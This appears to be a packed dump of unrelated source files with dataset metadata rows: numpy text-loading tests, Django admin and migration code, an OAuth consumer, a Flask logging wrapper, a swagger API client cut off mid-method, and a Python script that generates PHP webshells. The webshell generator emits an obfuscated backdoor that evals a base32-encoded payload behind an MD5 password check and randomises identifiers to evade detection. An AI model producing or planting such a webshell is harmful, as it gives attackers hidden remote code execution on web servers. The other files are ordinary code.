mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
data.seek(0)
test = np.mafromtxt(data,
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_withmissing_float(self):
data = StringIO.StringIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',', missing='-999.0',
names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = StringIO.StringIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, missing='2,5', dtype=None, usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0],[0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = StringIO.StringIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, missing='2,5', dtype=None, usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0),(0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_recfromtxt(self):
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromtxt(data, delimiter=',', missing='N/A', names=True)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, delimiter=',', missing='N/A',
names=True, usemask=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing='N/A',
names=True, case_sensitive=True)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, missing='N/A',
names=True, case_sensitive=True, usemask=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = StringIO.StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokeness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = StringIO.StringIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write('1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = StringIO.StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write('1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | 7,035,468,945,602,116,000 | 35.440936 | 86 | 0.505472 | false | 3.270733 | true | false | false |
SmartElect/SmartElect | staff/admin.py | 1 | 1127 | from django.contrib.auth.models import User, Group, Permission
from django.contrib.auth.admin import UserAdmin, GroupAdmin
from libya_elections.admin_site import admin_site
class LibyaUserAdmin(UserAdmin):
list_display = ('username', 'email', 'first_name', 'last_name', 'is_active', 'is_staff',
'is_superuser')
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', 'password1', 'password2', 'email')
}),
)
def get_actions(self, request):
""""Don't allow bulk deletion."""
return {}
def get_form(self, request, obj=None, **kwargs):
"""Make email a required field."""
form = super(LibyaUserAdmin, self).get_form(request, obj, **kwargs)
email = form.base_fields['email']
email.required = True
return form
def has_delete_permission(self, request, obj=None):
"""Don't allow deletion of users. (Inactivate them instead)."""
return False
admin_site.register(User, LibyaUserAdmin)
admin_site.register(Group, GroupAdmin)
admin_site.register(Permission)
| apache-2.0 | -4,079,308,572,742,323,700 | 30.305556 | 92 | 0.62378 | false | 3.794613 | false | false | false |
CLLKazan/iCQA | qa-engine/forum_modules/oauthauth/consumer.py | 1 | 3718 | import urllib
import urllib2
import httplib
import time
from forum.authentication.base import AuthenticationConsumer, InvalidAuthentication
from django.utils.translation import ugettext as _
from lib import oauth
class OAuthAbstractAuthConsumer(AuthenticationConsumer):
def __init__(self, consumer_key, consumer_secret, server_url, request_token_url, access_token_url, authorization_url):
self.consumer_secret = consumer_secret
self.consumer_key = consumer_key
self.consumer = oauth.OAuthConsumer(consumer_key, consumer_secret)
self.signature_method = oauth.OAuthSignatureMethod_HMAC_SHA1()
self.server_url = server_url
self.request_token_url = request_token_url
self.access_token_url = access_token_url
self.authorization_url = authorization_url
def prepare_authentication_request(self, request, redirect_to):
request_token = self.fetch_request_token()
request.session['unauthed_token'] = request_token.to_string()
return self.authorize_token_url(request_token)
def process_authentication_request(self, request):
unauthed_token = request.session.get('unauthed_token', None)
if not unauthed_token:
raise InvalidAuthentication(_('Error, the oauth token is not on the server'))
token = oauth.OAuthToken.from_string(unauthed_token)
if token.key != request.GET.get('oauth_token', 'no-token'):
raise InvalidAuthentication(_("Something went wrong! Auth tokens do not match"))
access_token = self.fetch_access_token(token)
return access_token.to_string()
def get_user_data(self, key):
#token = oauth.OAuthToken.from_string(access_token)
return {}
def fetch_request_token(self):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, http_url=self.request_token_url)
oauth_request.sign_request(self.signature_method, self.consumer, None)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.request_token_url, data)
response = urllib2.urlopen(full_url)
return oauth.OAuthToken.from_string(response.read())
def authorize_token_url(self, token, callback_url=None):
oauth_request = oauth.OAuthRequest.from_token_and_callback(token=token,\
callback=callback_url, http_url=self.authorization_url)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.authorization_url, data)
return full_url
def fetch_access_token(self, token):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, token=token, http_url=self.access_token_url)
oauth_request.sign_request(self.signature_method, self.consumer, token)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.access_token_url, data)
response = urllib2.urlopen(full_url)
return oauth.OAuthToken.from_string(response.read())
def fetch_data(self, token, http_url, parameters=None):
access_token = oauth.OAuthToken.from_string(token)
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer, token=access_token, http_method="GET",
http_url=http_url, parameters=parameters,
)
oauth_request.sign_request(self.signature_method, self.consumer, access_token)
url = oauth_request.to_url()
connection = httplib.HTTPSConnection(self.server_url)
connection.request(oauth_request.http_method, url)
return connection.getresponse().read()
| gpl-3.0 | -633,388,579,268,110,200 | 41.735632 | 126 | 0.686391 | false | 3.963753 | false | false | false |
mferenca/HMS-ecommerce | ecommerce/invoice/migrations/0001_initial.py | 1 | 2891 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import django.utils.timezone
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('basket', '0006_basket_site'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HistoricalInvoice',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),
('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),
('state', models.CharField(default=b'Not Paid', max_length=255, choices=[(b'Not Paid', 'Not Paid'), (b'Paid', 'Paid')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('basket', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='basket.Basket', null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical invoice',
},
),
migrations.CreateModel(
name='Invoice',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),
('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),
('state', models.CharField(default=b'Not Paid', max_length=255, choices=[(b'Not Paid', 'Not Paid'), (b'Paid', 'Paid')])),
('basket', models.ForeignKey(to='basket.Basket')),
],
options={
'ordering': ('-modified', '-created'),
'abstract': False,
'get_latest_by': 'modified',
},
),
]
| agpl-3.0 | 945,000,647,318,833,700 | 53.54717 | 176 | 0.603597 | false | 4.118234 | false | false | false |
bayazee/flacon | flacon/utils/extended_logging.py | 1 | 6366 | import sys
from flask import _request_ctx_stack
def wrap_app_logger(app):
"""
This function given Application and add logger for that.
:param app: Application Object
:type app: Object
"""
app.debug_log_format = app.config['LOG_FORMAT']
app._logger = None
app._logger = LoggerWrapper(app.logger, app.logger_name)
if not app.debug:
from logging import StreamHandler, DEBUG, Formatter
handler = StreamHandler()
handler.setLevel(app.config.get('LOG_LEVEL', DEBUG))
handler.setFormatter(Formatter(app.config.get('LOG_FORMAT', app.debug_log_format)))
app._logger.addHandler(handler)
app.logger.info('Starting project')
class LoggerWrapper(object):
"""
This Class initial and make Logger wrapper.
:param logger: Logger instance object
:type logger: Object
:param logger_name: Name for save logger as it
"type logger_name: String
"""
def __init__(self, logger, logger_name):
self.logger_name = logger_name
self.logger = logger
self.extra_handlers = []
def process(self, msg, args, kwargs):
"""
This function given message as msg and argument as args and kwargs, then create logger messages.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
:returns: Set of msg, args, kwargs.
:rtype: Set
"""
path = method = remote_addr = user_agent = url = u''
ctx = _request_ctx_stack.top
if ctx is not None:
path = ctx.request.path
url = ctx.request.url
method = ctx.request.method
remote_addr = ctx.request.remote_addr
user_agent = ctx.request.headers.get('user-agent', u'')
kwargs['extra'] = dict(
logger_name=self.logger_name,
http_path=path,
http_url=url,
http_method=method,
http_remote_addr=remote_addr,
http_user_agent=user_agent
)
for handler in self.extra_handlers:
kwargs['extra'].update(handler(ctx))
if args:
# if isinstance(args[0], dict):
msg = msg + ' ' + repr(args[0])
return msg, [], kwargs
def create_logger(self, name):
"""
This Function create Logger with given name.
:param name: Logger name for creating logger
:type name: String
"""
assert not hasattr(self, name)
setattr(self, name, LoggerWrapper(self.logger, name))
def debug(self, msg, *args, **kwargs):
"""
This function create and execute log with Debug mode.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.debug(msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
This function create and execute log with Info mode.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.info(msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
This function create and execute log with Warning mode.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
This function create and execute log with Error mode.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.error(msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
This function create and execute log for exception raise error.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
kwargs['exc_info'] = sys.exc_info()
self.logger.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
This function create and execute log with Critical mode.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.critical(msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
This function create and execute log.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.log(level, msg, *args, **kwargs)
def __getattr__(self, name):
return getattr(self.logger, name)
@property
def inject(self, f):
"""
:example:
.. code-block:: python
app.logger.inject
def log_user(ctx):
d = {}
d['app_user'] = 'anonymous'
if ctx is not None and ctx.g.user is not None:
d['app_user'] = ctx.g.user.mailbox
return d
"""
self.extra_handlers.append(f)
return f
| bsd-3-clause | -2,105,913,396,540,555,800 | 29.170616 | 104 | 0.570531 | false | 4.139142 | false | false | false |
tennc/webshell | php/create_webshell_with_py.py | 1 | 2291 | import random
#author: pureqh
#github: https://github.com/pureqh/webshell
#use:GET:http://url?pass=pureqh POST:zero
shell = '''<?php
class {0}{1}
public ${2} = null;
public ${3} = null;
function __construct(){1}
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->{3} = @{9}($this->{2});
@eval({5}.$this->{3}.{5});
{4}{4}{4}
new {0}();
function {6}(${7}){1}
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 8;
$v += ord(${7}[$i]);
$vbits += 8;
while ($vbits >= 5) {1}
$vbits -= 5;
${8} .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);{4}{4}
if ($vbits > 0){1}
$v <<= (5 - $vbits);
${8} .= $BASE32_ALPHABET[$v];{4}
return ${8};{4}
function {9}(${7}){1}
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 5;
if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
$v += (ord(${7}[$i]) - 97);
{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
$v += (24 + ${7}[$i]);
{4} else {1}
exit(1);
{4}
$vbits += 5;
while ($vbits >= 8){1}
$vbits -= 8;
${8} .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);{4}{4}
return ${8};{4}
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
lef = '''{'''
parameter1 = random_name(4)
parameter2 = random_name(4)
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
fun1 = random_name(4)
fun1_vul = random_name(4)
fun1_ret = random_name(4)
fun2 = random_name(4)
shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
return shellc
if __name__ == '__main__':
print (build_webshell())
| gpl-3.0 | -521,559,099,805,396,200 | 27.283951 | 102 | 0.454387 | false | 2.568386 | false | false | false |
Mapotempo/mapotempo-qgis-plugin | SwaggerMapo/apis/plannings_api.py | 1 | 44443 | #!/usr/bin/env python
# coding: utf-8
"""
PlanningsApi.py
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
"""
from __future__ import absolute_import
import sys
import os
# python 2 and python 3 compatibility library
from six import iteritems
from .. import configuration
from ..api_client import ApiClient
class PlanningsApi(object):
def __init__(self, api_client=None):
if api_client:
self.api_client = api_client
else:
if not configuration.api_client:
configuration.api_client = ApiClient('http://beta.app.mapotempo.com/api')
self.api_client = configuration.api_client
def get_plannings(self, **kwargs):
"""
Fetch customer's plannings.
:return: list[V01Planning]
"""
all_params = []
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_plannings" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='list[V01Planning]', auth_settings=auth_settings)
return response
def create_planning(self, name, **kwargs):
"""
Create planning.
:param str name: (required)
:param str ref:
:param str date:
:param int zoning_id:
:param bool out_of_date:
:param list[int] route_ids:
:param list[int] tag_ids:
:return: V01Planning
"""
# verify the required parameter 'name' is set
if name is None:
raise ValueError("Missing the required parameter `name` when calling `create_planning`")
all_params = ['name', 'ref', 'date', 'zoning_id', 'out_of_date', 'route_ids', 'tag_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method create_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'POST'
path_params = {}
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'name' in params:
form_params['name'] = params['name']
if 'ref' in params:
form_params['ref'] = params['ref']
if 'date' in params:
form_params['date'] = params['date']
if 'zoning_id' in params:
form_params['zoning_id'] = params['zoning_id']
if 'out_of_date' in params:
form_params['out_of_date'] = params['out_of_date']
if 'route_ids' in params:
form_params['route_ids'] = params['route_ids']
if 'tag_ids' in params:
form_params['tag_ids'] = params['tag_ids']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def delete_plannings(self, ids, **kwargs):
"""
Delete multiple plannings.
:param list[Integer] ids: (required)
:return: str
"""
# verify the required parameter 'ids' is set
if ids is None:
raise ValueError("Missing the required parameter `ids` when calling `delete_plannings`")
all_params = ['ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method delete_plannings" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'DELETE'
path_params = {}
query_params = {}
if 'ids' in params:
query_params['ids'] = params['ids']
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def get_planning(self, id, **kwargs):
"""
Fetch planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `get_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def update_planning(self, id, **kwargs):
"""
Update planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str name:
:param str ref:
:param str date:
:param int zoning_id:
:param bool out_of_date:
:param list[int] route_ids:
:param list[int] tag_ids:
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_planning`")
all_params = ['id', 'name', 'ref', 'date', 'zoning_id', 'out_of_date', 'route_ids', 'tag_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'name' in params:
form_params['name'] = params['name']
if 'ref' in params:
form_params['ref'] = params['ref']
if 'date' in params:
form_params['date'] = params['date']
if 'zoning_id' in params:
form_params['zoning_id'] = params['zoning_id']
if 'out_of_date' in params:
form_params['out_of_date'] = params['out_of_date']
if 'route_ids' in params:
form_params['route_ids'] = params['route_ids']
if 'tag_ids' in params:
form_params['tag_ids'] = params['tag_ids']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def delete_planning(self, id, **kwargs):
"""
Delete planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `delete_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method delete_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'DELETE'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def automatic_insert_stop(self, id, **kwargs):
"""
Suggest a place for an unaffected stop.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `automatic_insert_stop`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method automatic_insert_stop" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/automatic_insert.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def clone_planning(self, id, **kwargs):
"""
Clone the planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `clone_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method clone_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/duplicate.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def optimize_routes(self, id, **kwargs):
"""
Starts asynchronous routes optimization.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `optimize_routes`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method optimize_routes" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/optimize_each_routes.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def use_order_array(self, id, order_array_id, shift, **kwargs):
"""
Use order_array in the planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str order_array_id: (required)
:param int shift: (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `use_order_array`")
# verify the required parameter 'order_array_id' is set
if order_array_id is None:
raise ValueError("Missing the required parameter `order_array_id` when calling `use_order_array`")
# verify the required parameter 'shift' is set
if shift is None:
raise ValueError("Missing the required parameter `shift` when calling `use_order_array`")
all_params = ['id', 'order_array_id', 'shift']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method use_order_array" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/orders/{order_array_id}/{shift}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'order_array_id' in params:
path_params['order_array_id'] = params['order_array_id']
if 'shift' in params:
path_params['shift'] = params['shift']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def refresh_planning(self, id, **kwargs):
"""
